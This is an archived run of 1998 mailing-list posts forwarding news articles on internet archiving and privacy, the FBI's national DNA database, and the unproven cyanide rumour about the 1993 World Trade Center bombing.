To: "C.Bryson Hull" <cbryson@hotmail.com>, misc-activism-militia@moderators.uu.net



------------------------
  From: "Adolph V. Stankus" <Adolph@Stankus.com>
  Subject: Every word on the Internet is recorded for ALL time 
  Date: Mon, 12 Oct 1998 15:13:34 -0700 
  To: A Message For You <Adolph@Stankus.com>


http://search.washingtonpost.com/wp-srv/WPlate/1998-10/11/129l-101198-idx.ht
ml

Washington Post, Sunday, October 11, 1998; Page C01

Your Past Is Your Future, Web-Wise By Joseph D. Lasica

SAN FRANCISCO, Calif.-Our past now follows us as never before. For
centuries, refugees sailed the Atlantic to start new lives. Easterners
pulled up stakes and went west to California. Today, however, reinvention
comes less easily and second chances seem more remote. You may leave town,
but your electronic shadow stays behind, as anyone who has ventured onto the
Internet well knows.

We often view the Internet as a communication medium or an
information-retrieval tool, but it's also a powerful archiving medium that
takes snapshots of our digital lives--which can be stored forever.

It's not just official documents or consumer profiles about us that are
being collected, but the very essence of our daily online existence: Our
political opinions, prejudices, religious beliefs, sexual tastes and
personal quirks are all becoming part of an immense media goop that is
congealing into a permanent public record. What is different about the
digital archiving phenomenon is that our beliefs, habits and indiscretions
are being preserved for anyone to see--friends, relatives, rivals, lovers,
neighbors, bosses, landlords, and even obsessed stalkers.

Take all those ordinary Web pages that many of us have created in a burst of
enthusiasm with the new medium. People assume that their home pages
disappear once they pull the plug. Not necessarily. Sure, browsers and
search engines give you a "404: File Not Found" message when you call up
outdated Web pages. But those pages live on in other electronic nooks and
crannies. Since 1986, the Internet Archive, a kind of digital warehouse, has
been trolling the Web and hoarding everything it comes across--text, images,
sound clips. Every two months, it scoops up the entire Web and stores the
results on its virtual shelves. It has preserved my expired site, and it may
well have yours.

Similarly, postings to the Internet's 33,000 news groups may fall off the
edge of Usenet after a week or so, but they live on in databases such as
Deja News and the Internet Archive. Marie Coady, a freelance writer in
Woburn, Mass., was appalled to discover that her posts to online-news, a
small, cozy listserv of 1,350 news professionals, was available to anyone
through dozens of search engines on the Web. "I consider it an invasion of
privacy to have words typed in response to a query chiseled in stone," she
said. "In light of our litigious society, it could be dangerous to post any
message at all."

Many moderators post occasional notices about a list's public archiving
policy. But not all do, and few users read the fine print, anyway. "The odd
thing is, we perceive the Net as a conversation and not as public record,
and it turns out to be public record to a larger extent than people are
aware of," said Bruce Schneier, a cryptography consultant and co-editor of
"The Electronic Privacy Papers," a 1997 book. "You can easily imagine in 20
years a candidate being asked about a conversation he had in a chat room
while he was in college. We're becoming a world where everything is
recorded."

Beyond the question of informed consent lie larger questions: Should all of
this electronic flotsam and jetsam be archived in the first place? What are
the consequences for us if our digital footprints survive indefinitely? Who
should decide whether they do survive?

The answers are hardly comforting, especially for those given to strong
displays of emotion or opinion online. "We're now entering an era where tens
of millions of people are speaking on the record without any understanding
of what it means to speak on the record, and that's certainly
unprecedented," says David Sobel, general counsel for the Electronic Privacy
Information Center in Washington. "It is suddenly becoming impossible to
escape your past."
Your children and grandchildren not yet born will be able to reconstruct a
record of your digital life--not just the good stuff but also the
best-forgotten postings to alt.sex.fish or rec.nude. The Web shrine you once
erected to an old flame, with its hyperventilating vows of eternal devotion,
may give pause to a new lover in your life. The union solidarity page you
put up at your first job--years before you were bucking for senior
management--may come back to haunt your efforts to get a promotion. And who
would have predicted that your Senate candidacy would go down in flames when
your political opponent uncovered the image-rich homage to porn star Ashlyn
Gere you posted in college?

Most people don't have posterity in mind when they fire off notes or post
Web pages. Observes Schneier: "When you're in college and posting things
online, you're young and immortal and you don't think about the impact your
words will have five minutes from now, much less five, 10 or 20 years down
the road."

We can already see the outlines of this new world. When you apply for a job
in the high-tech sector, there's a fair chance your prospective employer
will use a search engine to scout out your online postings, from late-night
musings to intemperate rants fired off to a political news group. Would an
employer's decision be colored by information that has nothing to do with a
candidate's job qualifications, such as your out-of-the-mainstream religious
beliefs, sexual orientation, HIV status or personal habits? Absolutely, and
without apology. After all, "character" counts, too.

Federal law makes it a crime for agencies to compare most digital
information about U.S. citizens, points out Fred Cate, a law professor at
Indiana University and author of "Privacy in the Information Age." But
nothing prevents private companies or individuals from doing so. Criminal
convictions, driving records, property records and voter registration
records might be available with a few keystrokes.

Should employers, neighbors and descendants not yet born be able to poke
around in the digital attic for information about you?

Cate believes there are good reasons why we shouldn't be so concerned. "It's
the democratizing of Big Brother, and that's not such a bad thing," he says.
"You can find out as much about your boss as he can about you. I'm not
really happy that someone down the hall can follow me and make a database
about me, but that's the way it is in the digital age. If your feelings get
bruised, tough. If the information's true and not distorted, then you're
stuck with the things you said online years ago. I don't see this as a
privacy issue."

Perhaps not in the narrowest sense. But if every online expression becomes
fodder for somebody's professional, personal or political agenda, clearly we
lose certain freedoms of expression in the bargain. Do you really want to
live next door to Big Brother, even a more democratic one? Sobel says, "If
you define privacy as the right of individuals to control information about
themselves--as we do--then mega-archiving systems clearly raise significant
privacy issues. These systems convert every passing thought and
contemporaneous musing into a permanent, retrievable record--without, in
many cases, the knowledge or consent of the creator."

Even Brewster Kahle, who founded the nonprofit Internet Archive
(www.archive.org) and its commercial offshoot, Alexa Internet (www.aorg),
says, "There are some tricky issues here. A lot of this material is public,
but is it really meant to endure?"

What Kahle is doing is nothing less than astonishing. Alexa's 32 employees,
working in a century-old building in San Francisco's Presidio, sends out
"spiders" to crawl the Web and Usenet and store the text, video and audio on
a digital jukebox tape drive. It takes about two months to capture all 300
million publicly accessible Web pages. So far they've scooped up 10
terabytes of content, or 10 trillion bytes.

Kahle says he launched his project because "we need to preserve our digital
heritage. Unless we start saving it, every passing day we're losing the
record of one of the great turning points in human history." His Internet
Archive and Alexa have drawn widespread praise from academics, historians
and Net luminaries concerned that the Web's pioneer days may soon become
irretrievably lost. For researchers and scholars, it's a field day. For the
rest of us, it's a mixed blessing.

Sobel points out that individuals can't even prevent private indiscretions
from winding up as part of the Internet's global voyeurism machine. "I just
got a phone call from a distraught mother whose 16-year-old daughter's
ex-boyfriend posted nude photos of her on the Web. The photos were
consensual when they were taken. So suddenly it's part of the public domain,
and even if the mother persuades him to take them down, he may no longer
have control over how long this stuff is out there. This teenage girl may
have to live with that for the rest of her life."

Kahle offers another example: "The president's personal home page is
probably in our archives now--the person who'll become president in 20 or 30
years. You know that he or she is the kind of person who already has a Web
page up in college."

Are we condemned, then, to a future where journalists will pore over every
online college-age musing of a prospective president? It appears that way.
"I'm still struggling with the issues raised by this," Sobel says. "We need
a public debate to redefine the concepts of what should be private and
public. Should anyone be able to type your name into a search engine and
come up with public records about your private life? What good are laws that
expunge a crime from your record if the old records remain accessible to
anyone on the Net? What about information that's misleading, inaccurate, or
that you had no idea was out there in cyberspace?"

Kahle is well aware of the debate, and he's working with legal experts,
historians and privacy advocates to determine the best way to make archived
material available. "I used to be very oriented toward privacy, trying to
keep track of who knows what about me," he said. "I've become less fanatical
about it, because I find that it's more valuable to be found than for me to
be obscure. For those who don't want to be found, we should let them be."

One may well ask: Do we have that option anymore? As the Net becomes
ubiquitous, its underlying essence of interconnectedness and community come
with a price: the loss of anonymity. We are being drawn forcibly,
inexorably, into the global town square.
That is no reason to avoid the Internet (as if we could!). It is becoming
inextricably woven into the fabric of our everyday lives. As it should be,
for the Net is a gift, connecting us with like-minded individuals around the
world and allowing us to interact in soul-stirring ways. But we need to be
aware that our digital footprints are permanent ones.

Once, words were spoken and vanished like vapor in the air. No longer. Our
pasts are etched like a tattoo into our digital skins. For better or worse,
we're no longer a people who can reinvent ourselves.

Joseph Lasica writes frequently about new media.

(c) Copyright 1998 The Washington Post Company



---------------End of Original Message-----------------

===================================================================
Constitution Society, 1731 Howe Av #370, Sacramento, CA 95825
916/568-1022, 916/450-7941VM         Date: 10/12/98  Time: 17:09:43
http://www.constitution.org/     mailto:jon.roland@constitution.org
===================================================================




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 14 Oct 1998 06:28:01 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.35: F.B.I. Set to Begin Using National DNA Database
Message-ID: <199810132157.OAA10034@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.35: F.B.I. Set to Begin Using National DNA Database
Date: Tue, 13 Oct 1998 00:39:34 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.35: F.B.I. Set to Begin Using National DNA Database
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Tuesday October 13, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: The New York Times, October 12, 1998
http://www.nytimes.com

F.B.I. Set to Begin Using National DNA Database
http://www.nytimes.com/yr/mo/day/news/national/dna-data-base.html


        "The DNA data base started out with pariahs -- the sex
        offenders -- but has already been enlarged to include other
        felons and will probably be extended to include everyone,
        giving elites the power to control 'unruly' citizens."

By
NICHOLAS WADE

n a computer at a secret location, the FBI will open a national DNA
database on Tuesday that advocates say could significantly reduce rape and
other crimes by helping to catch repeat offenders earlier.

The data base, with a new generation of forensic DNA techniques, promises
to be so efficient that some civil libertarians fear it will be expanded
from people convicted of crimes to include almost everyone, giving the
government inordinate investigative powers over citizens.

The national DNA data base consists of 50 data bases run by the states but
unified by common test procedures and software designed by the FBI. As of
Tuesday, it will be possible to compare a DNA sample from a suspect or
crime scene in one state with all others in the system.

The national data base has been nearly a decade in the making. The final
pieces fell into place in June when Rhode Island became the last state to
set up a DNA data base.

But the system still faces many unresolved issues, which are likely to play
out according to the reaction from the public and the courts. One such
issue is what types of offenders should be included. Another is whether the
mass screening of suspects' DNA will prove constitutional.

DNA, the chemical that embodies a person's genetic programming, can be
found almost everywhere. People shed a constant torrent of dead skin cells.
Criminals leave blood when breaking and entering; they shed hair and skin
cells in fights, deposit saliva on glasses and leave sweat stains in head
bands. From only a few cells in such sources, enough DNA can be extracted
to identify the owner. A DNA database of sufficient size could presumably
help solve many crimes.

The crime-fighting potential of DNA data bases is becoming evident from the
experiences of Britain, which started earlier and has had fewer
administrative and constitutional hurdles to overcome. The data base there
initially focused on sex offenses but has spread to include burglaries and
car theft because of the high number of DNA matches that police forces were
obtaining. Moreover, there was considerable crossover at least in Britain,
among different kinds of offenses.

"People who commit serious crime very often have convictions for petty
crime in their history, so if you could get them on the data base early you
may prevent serious crime," said David Werrett, manager of the DNA data
base for England and Wales.

The English DNA data base includes entries from crime scenes and from
everyone convicted of a crime, as well as from suspects in unresolved
cases. Since the system's debut in 1995, it has matched 28,000 people to
crime scenes and has made 6,000 links between crime scenes. The data base
now holds 360,000 entries and Werrett said he expected it would eventually
include one third of all English men between 16 and 30, the principal ages
for committing crimes.

Werrett said that the data base has grown because police forces in England,
which pay $55 for a DNA analysis, are finding it cost effective. Recently
the Police Superintendents Association called for the entire population to
be DNA tested.

Forensic use of DNA in the United States is unlikely to go as fast or as
far as in Britain.


"Their system makes a tremendous amount of sense the way they approach it,
but in the United States we have a different perspective on privacy and on
the extent to which we would be willing to depend on a data base," said
Christopher Asplen, executive director of the national Commission on the
Future of DNA Evidence.

One major privacy safeguard in the FBI's system is that only a minute
fraction of a person's genetic endowment becomes part of the data base.
Under a new DNA profiling system known as STR's, for short tandem repeats,
a person's DNA is tested at 13 specific sites at which a short length of
DNA is repeated in a kind of stutter. The number of repeats is highly
variable from one person to another, so that measuring the number of
repeats at the 13 designated sites gives a way of identifying each
individual with a probability of one in several billion.

The blood or other samples donated by individuals are retained by the
states in collections known as DNA banks. All that goes into the
computerized DNA data bases is the set of 13 numbers from the STR
measurements. Only identifying information, and nothing about a person's
health or appearance, can be divined from the STR's.

Access to the DNA data base is permitted only for law enforcement purposes,
with a $100,000 fine for unauthorized disclosures. No known breaches of the
system have occurred.

One major unresolved issue is that of the types of offenders from whom DNA
profiles should be taken. All states require people convicted of serious
sexual offenses to donate blood samples, but differ on requiring samples
from other groups such as people convicted of violent felonies, juvenile
offenders and parolees.

Four states -- Virginia, Wyoming, New Mexico and Alabama -- require all
people convicted of a felony to provide samples for DNA profiling.
Louisiana allows DNA to be taken from people merely arrested in a crime, a
practice that has not been tested in the courts.

State laws establishing DNA data bases have been challenged in 13
jurisdictions and have been upheld in all but one, in Massachusetts. Some
states have revised their original legislation to add offenses.

"I think the trend is that 10 years from now all felonies will be covered,"
said M. Dawn Herkenham, chief of the FBI's Forensic Science Systems Unit in
Washington. "We recommend that all violent felonies, burglaries, juveniles
and retroactivity for people on parole be included."

>From his office in Birmingham, England, last week, Werrett said, "Today we
have issued matches on three murders, five rapes, nine serious robberies,
two abductions and two violent burglaries."

No state DNA data base has acquired the critical mass to furnish such a hit
rate. Many state laboratories are understaffed and have large backlogs of
DNA samples to analyze. The backlogs are particularly worrisome in the case
of rapes where specimens may lie unanalyzed while the rapist assaults more
victims. "People may be appalled to know how many rape suspect kits are out
there untouched," Ms. Herkenham of the FBI said.

"The hit ratio depends on whether we can go back and examine all the
evidence that comes in the door," said Dr. Barry Duceman, director of
biological science in the New York State Police Forensic Investigation
Center in Albany. "We are trying to address a crushing case backlog and to
get the technology on line -- you'd be hard pressed to say we are
overstaffed."

The case backlog problem is compounded because state laboratories are
switching to the STR method of DNA profiling from an older method of
analysis called RFLP (for restriction fragment length polymorphism). All
the samples analyzed by RFLP must be redone by STR if they are to be
searchable in the new data base.

When these teething problems are overcome, many experts believe that the
state and national DNA data base systems may have a significant effect,
particularly in reducing crimes like rape that often involve repeat
offenders. By scoring a "cold hit" between crime scene data and a person,
DNA data bases can be particularly effective in solving cases with no
suspects.

"Once we get that infrastructure in place and start getting those hits, the
benefits will lead to higher utilization," Asplen said.

But like other experts involved with DNA testing, he expressed concern that
DNA profiling be developed in a publicly acceptable way. "The public does
need to have a trust level with this and be assured that law enforcement is
not going to abuse this powerful tool," he said. One practice likely to
raise eyebrows, if not hackles, is mass screening, which is widely used in
the United Kingdom but not yet commonplace here.

In high profile crime cases, police in Britain often ask, and can require,
all members of a town or building to give DNA samples so as to prove
themselves guiltless and help narrow the search for the culprit. The
National Commission on the Future of DNA Testing is examining under what
circumstances the donation of samples can be considered voluntary. In an
office, where employees who declined to donate a sample might be fired, a
police request for DNA might be coercive.

A future use of DNA testing is that of phenotypic analysis. It will soon be
technically possible to infer from the genes in a person's DNA many
probable aspects of their appearance, such as hair, skin and eye color.
Werrett said the main problem with such predictions would lie in training
police to understand their probabilistic nature: told there is a 90 percent
chance that the suspect has red hair, investigators should not ignore the
10 percent chance that he does not.

DNA reveals so much about a person that behavioral geneticists might wish
to search through state data banks for genetic variants linked to criminal
behavior. Most states say their DNA data banks can be accessed only for law
enforcement purposes, like the data bases. But Alabama authorizes the use
of its samples for "educational research or medical research or
development," an apparent invitation to genetic inquiry.

An impending issue is whether states should retain their DNA samples once
the information has been entered into the DNA data base. Forensic managers
like to retain samples as a hedge against changing technology. Others say
the DNA sample banks create an opportunity for abuse, and that if there is
another change in technology the government should just rebuild its data
base from scratch.

Because DNA can be found at so many crime scenes, DNA data bases promise to
be powerful aids in catching criminals. But what thrills forensic experts
tends to chill civil libertarians.

"The DNA data base started out with pariahs -- the sex offenders -- but has
already been enlarged to include other felons and will probably be extended
to include everyone, giving elites the power to control 'unruly' citizens,"
said Philip Bereano a professor of technology and public policy at the
University of Washington in Seattle.

Dr. Eric Juengst, a bioethicist at Case Western Reserve University in
Cleveland and a member of the FBI's DNA Advisory Board, said the original
policy in setting up the DNA data base was that it was "suitable only for
our most serious category of criminals," and that it would be a breach of
that policy to expand its scope.

The risks raised by Bereano are worth watching, Juengst said, "but as a
society we have to learn how to control powerful tools of all kinds, like
nuclear power. I don't see it as an endless slippery slope."

Copyright 1998 The New York Times Company

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.














**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 14 Oct 1998 06:25:48 +0800
To: cypherpunks@cyberpass.net
Subject: IP: "The Billion Dollar Terror Rumor"
Message-ID: <199810132157.OAA10046@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: "The Billion Dollar Terror Rumor"
Date: Tue, 13 Oct 1998 06:31:30 -0500
To: believer@telepath.com

Source:  Salon Magazine
http://www.salonmagazine.com/news/1998/10/08newsa.html

The billion-dollar rumor 

 How unsubstantiated reports
 that the World Trade bombers
 may have included nerve gas in
 their arsenal led to some pretty
 pricey public policy. 

 BY JEFF STEIN

 It began as rumor, then
 became fact. 

 Fact became alarm. And
 alarm led to a rallying cry
for a multimillion-dollar federal program that has
now itself ricocheted out of control. 

Kenneth Starr's investigation of President Clinton?
No, it's the federal budget for countering a
doomsday attack by terrorists armed with chemical
and biological weapons. 

The rumor in this case was that terrorists had put
deadly sodium cyanide into the monstrous February
1993 World Trade Center bomb that killed six
people, injured more than 1,000, blasted a
seven-story hole underneath the twin towers and
created panic in the streets of lower Manhattan.
The blast should have turned any sodium cyanide
present into hydrogen cyanide, unleashing a
poisonous cloud that could have instantly killed
hundreds or thousands more people. 

That is, had any sodium cyanide been there.
According to a thorough, as yet unpublished study
of the incident by an arms-control think tank at the
Monterey Institute for International Studies, there is
no evidence to support the long-swirling assertion,
which first surfaced in the solemn pronouncement
of a respected federal judge in 1994. The rumor
then made its way into scores of newspaper articles
and was cited by leading U.S. senators to support
anti-terrorist initiatives that have amounted to
billions of dollars, many of them unaccounted for,
according to a recent investigation by congressional
auditors. 

John Parachini, a senior associate at the Monterey
Institute, made a draft of the study available after
being contacted by Salon. Word of his findings has
been circulating in the community of Washington
terrorism experts. "I'm not against spending money
for defending against chemical and biological
weapons," Parachini said in an interview, "but we
ought to know why we're spending for it, and to get
the facts straight." In his study, Parachini noted that
the World Trade Center bombers considered using
chemical weapons, but did not -- an important fact
for government terrorism specialists to ponder. 

"Examining the motivations and behaviors of
terrorists who would have used a chemical weapon
if it was available, but did not, may offer important
lessons about how to thwart such attacks in the
future," he writes. Parachini traced the origins of
the cyanide gas story to the first trial of World
Trade Center bombers in 1994, when federal
prosecutors raised the specter of a chemical bomb,
no doubt to darken the jury's view of the
defendants. The theme was picked up by presiding
federal Judge Kevin Duffy in his sentencing
statement to the stone-faced defendants. 

"You had sodium cyanide around, and I'm sure it
was in the bomb," the judge intoned. "Thank God
the sodium cyanide burned instead of vaporizing. If
the sodium cyanide had vaporized, it is clear what
would have happened is the cyanide gas would
have been sucked into the north tower and
everybody in the north tower would have been
killed. That to my mind is exactly what was
intended." 

The judge may have been "sure it was in the
bomb," but the defendants were never even
charged under anti-terrorism statutes that make
mere possession of potential chemical and biological
weapons a federal crime, Parachini noted. The
rumor's origins date back to an earlier raid by the
FBI of a New Jersey storage shed rented by the
suspects. The agents found one sealed bottle of
sodium cyanide in aqueous form. Aqueous sodium
cyanide is used for photographic purposes and can
cost less than $3 per pound, Parachini noted in his
study, after consulting chemical experts. But it is
sodium cyanide in solid form, usually briquettes
costing many hundreds of dollars more, that can be
effective as a chemical weapon when it's converted
to hydrogen cyanide gas by a blast. 

Nevertheless, the federal prosecutor in the initial
World Trade Center trial raised the idea of a
chemical bomb when questioning a senior FBI
official, Steven Burmeister, about the consequences
of mixing sodium cyanide with other chemicals
present in the bomb. Burmeister testified that "if
you breathe that gas I'm afraid you've breathed
your last breath." Despite this "chilling testimony,"
however, "Burmeister never suggested during the
trial that his investigation had led him to believe that
the bomb actually contained sodium cyanide,"
Parachini writes -- and the trial transcript proves. 

In addition, an FBI chemist who participated in the
case told Parachini flatly, "There is no forensic
evidence indicating the presence of sodium cyanide
at the bomb site." 

Judge Duffy's statement to the contrary, however,
gave legs to the notion that the defendants had
made -- or tried to make -- a chemical bomb. No
less an authority than Maj. Gen. George Friel, the
former head of the U.S. Army's Chemical and
Biological Defense Command, told Gannett News
Service that the World Trade Center bombers may
have attempted to mix a toxic agent -- most likely
arsenic -- with the bomb they planted in the garage
of the building. 

That was a new one to federal investigators.
Neither FBI agents nor prosecutors mentioned
arsenic as a bomb ingredient in the trial. Despite the
nonexistent evidence, however, Judge Duffy's
charge was taken up by two influential senators,
Richard Lugar, R-Ind., and Sam Nunn, D-Ga., who
called it "a warning bell." 

"The trial judge at the sentencing of those
responsible for the World Trade Center bombing
pointed out that the killers in that case had access to
chemicals to make lethal cyanide gas ... and
probably put those chemicals into that bomb that
exploded," Nunn said during a 1996 floor debate on
a multibillion-dollar bill aimed at bolstering U.S.
defenses against weapons of mass destruction. 

Lugar also cited Judge Duffy's statement as
evidence of "how close we have come to witnessing
acts of terrorism involving weapons of mass
destruction directed toward the United States." He
urged his Senate colleagues to "listen to Judge
Duffy," and compared the World Trade Center
bomb to both the 1995 sarin gas attack on the
Tokyo subway by Japanese cultists and the
placement of a radioactive package in a Moscow
park. 

The media were next to pick up Duffy's theme.
One typical story, in the Los Angeles Times in July
1996, stated, "The World Trade Center bombers
had sodium cyanide, which if used ... would have
released poison gas, vastly increasing the fatalities
in New York, intelligence officials said." Syndicated
columnist Trudy Rubin cited Judge Duffy in the
course of applauding "some farsighted lawmakers
trying to confront the unthinkable." 

The Nunn-Lugar bill, which included $235 million
for training local "first responders" to a chemical or
biological attack, passed 100-0. But that was
merely the gateway to a mushrooming federal
anti-terrorism crusade that now costs upwards of
$1 billion a year -- and perhaps twice that,
according to some experts -- and that last week led
to the creation of the Defense Threat Reduction
Agency, which will "spend hundreds of millions of
dollars in research for better sensors and technology
to detect biological and chemical weapons,"
according to the Associated Press. 

Counter-terrorism may be the magic word for
funding programs in Washington today, but a
withering audit by the General Accounting Office
has raised questions about where the money is
going: "More money is being spent to combat
terrorism without any assurance of whether it is
focused in the right programs or in the right
amounts,'' said Richard Davis, a GAO auditor
specializing in weapons of mass destruction.
"Billions of dollars are being spent by numerous
agencies with roles or potential roles in combating
terrorism, but because no federal entity has been
tasked to collect such information across the
government, the specific amount is unknown,'' the
GAO said in its most recent report on terrorism.
"Further, no government-wide spending priorities
for the various aspects of combating terrorism have
been set.'' 

Meanwhile, past studies have cautioned that while
chemical or biological weapons may be cheaper and
easier to make than nuclear bombs, terrorists have
shied away from using them. Despite past
allegations, neither the Red Army Faction, the
Beider-Meinhof Gang nor the Weather
Underground ever used them, Parachini concluded.

Ramzi Ahmed Yousef, the convicted mastermind
of the World Trade Center blast, made the point
himself while flying back in custody from Pakistan,
where he was captured in 1996, the Monterey
Institute study notes. "Yousef ... revealed to U.S.
Secret Service agent Brian Parr that the WTC
bomb did not contain sodium cyanide or any other
poison, but that he had planned to use 'hydrogen
cyanide in some other form of a bomb, not as large
a bomb, but a different type of bomb to disperse
that [poison] in the Trade Center,'" the study says. 

"Yousef told Parr that he had decided not to take
this approach because 'it was going to be too
expensive to implement.'" 

The judge may have been "sure it was in the
bomb," but the defendants were never even
charged under anti-terrorism statutes that make
mere possession of potential chemical and biological
weapons a federal crime, Parachini noted. The
rumor's origins date back to an earlier raid by the
FBI of a New Jersey storage shed rented by the
suspects. The agents found one sealed bottle of
sodium cyanide in aqueous form. Aqueous sodium
cyanide is used for photographic purposes and can
cost less than $3 per pound, Parachini noted in his
study, after consulting chemical experts. But it is
sodium cyanide in solid form, usually briquettes
costing many hundreds of dollars more, that can be
effective as a chemical weapon when it's converted
to hydrogen cyanide gas by a blast. 

Nevertheless, the federal prosecutor in the initial
World Trade Center trial raised the idea of a
chemical bomb when questioning a senior FBI
official, Steven Burmeister, about the consequences
of mixing sodium cyanide with other chemicals
present in the bomb. Burmeister testified that "if
you breathe that gas I'm afraid you've breathed
your last breath." Despite this "chilling testimony,"
however, "Burmeister never suggested during the
trial that his investigation had led him to believe that
the bomb actually contained sodium cyanide,"
Parachini writes -- and the trial transcript proves. 

In addition, an FBI chemist who participated in the
case told Parachini flatly, "There is no forensic
evidence indicating the presence of sodium cyanide
at the bomb site." 

Judge Duffy's statement to the contrary, however,
gave legs to the notion that the defendants had
made -- or tried to make -- a chemical bomb. No
less an authority than Maj. Gen. George Friel, the
former head of the U.S. Army's Chemical and
Biological Defense Command, told Gannett News
Service that the World Trade Center bombers may
have attempted to mix a toxic agent -- most likely
arsenic -- with the bomb they planted in the garage
of the building. 

That was a new one to federal investigators.
Neither FBI agents nor prosecutors mentioned
arsenic as a bomb ingredient in the trial. Despite the
nonexistent evidence, however, Judge Duffy's
charge was taken up by two influential senators,
Richard Lugar, R-Ind., and Sam Nunn, D-Ga., who
called it "a warning bell." 

"The trial judge at the sentencing of those
responsible for the World Trade Center bombing
pointed out that the killers in that case had access to
chemicals to make lethal cyanide gas ... and
probably put those chemicals into that bomb that
exploded," Nunn said during a 1996 floor debate on
a multibillion-dollar bill aimed at bolstering U.S.
defenses against weapons of mass destruction. 

Lugar also cited Judge Duffy's statement as
evidence of "how close we have come to witnessing
acts of terrorism involving weapons of mass
destruction directed toward the United States." He
urged his Senate colleagues to "listen to Judge
Duffy," and compared the World Trade Center
bomb to both the 1995 sarin gas attack on the
Tokyo subway by Japanese cultists and the
placement of a radioactive package in a Moscow
park. 

The media were next to pick up Duffy's theme.
One typical story, in the Los Angeles Times in July
1996, stated, "The World Trade Center bombers
had sodium cyanide, which if used ... would have
released poison gas, vastly increasing the fatalities
in New York, intelligence officials said." Syndicated
columnist Trudy Rubin cited Judge Duffy in the
course of applauding "some farsighted lawmakers
trying to confront the unthinkable." 

The Nunn-Lugar bill, which included $235 million
for training local "first responders" to a chemical or
biological attack, passed 100-0. But that was
merely the gateway to a mushrooming federal
anti-terrorism crusade that now costs upwards of
$1 billion a year -- and perhaps twice that,
according to some experts -- and that last week led
to the creation of the Defense Threat Reduction
Agency, which will "spend hundreds of millions of
dollars in research for better sensors and technology
to detect biological and chemical weapons,"
according to the Associated Press. 

Counter-terrorism may be the magic word for
funding programs in Washington today, but a
withering audit by the General Accounting Office
has raised questions about where the money is
going: "More money is being spent to combat
terrorism without any assurance of whether it is
focused in the right programs or in the right
amounts,'' said Richard Davis, a GAO auditor
specializing in weapons of mass destruction.
"Billions of dollars are being spent by numerous
agencies with roles or potential roles in combating
terrorism, but because no federal entity has been
tasked to collect such information across the
government, the specific amount is unknown,'' the
GAO said in its most recent report on terrorism.
"Further, no government-wide spending priorities
for the various aspects of combating terrorism have
been set.'' 

Meanwhile, past studies have cautioned that while
chemical or biological weapons may be cheaper and
easier to make than nuclear bombs, terrorists have
shied away from using them. Despite past
allegations, neither the Red Army Faction, the
Beider-Meinhof Gang nor the Weather
Underground ever used them, Parachini concluded.

Ramzi Ahmed Yousef, the convicted mastermind
of the World Trade Center blast, made the point
himself while flying back in custody from Pakistan,
where he was captured in 1996, the Monterey
Institute study notes. "Yousef ... revealed to U.S.
Secret Service agent Brian Parr that the WTC
bomb did not contain sodium cyanide or any other
poison, but that he had planned to use 'hydrogen
cyanide in some other form of a bomb, not as large
a bomb, but a different type of bomb to disperse
that [poison] in the Trade Center,'" the study says. 

"Yousef told Parr that he had decided not to take
this approach because 'it was going to be too
expensive to implement.'" 
SALON | Oct. 8, 1998 

Jeff Stein covers national security issues for Salon. 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 14 Oct 1998 06:33:38 +0800
To: cypherpunks@cyberpass.net
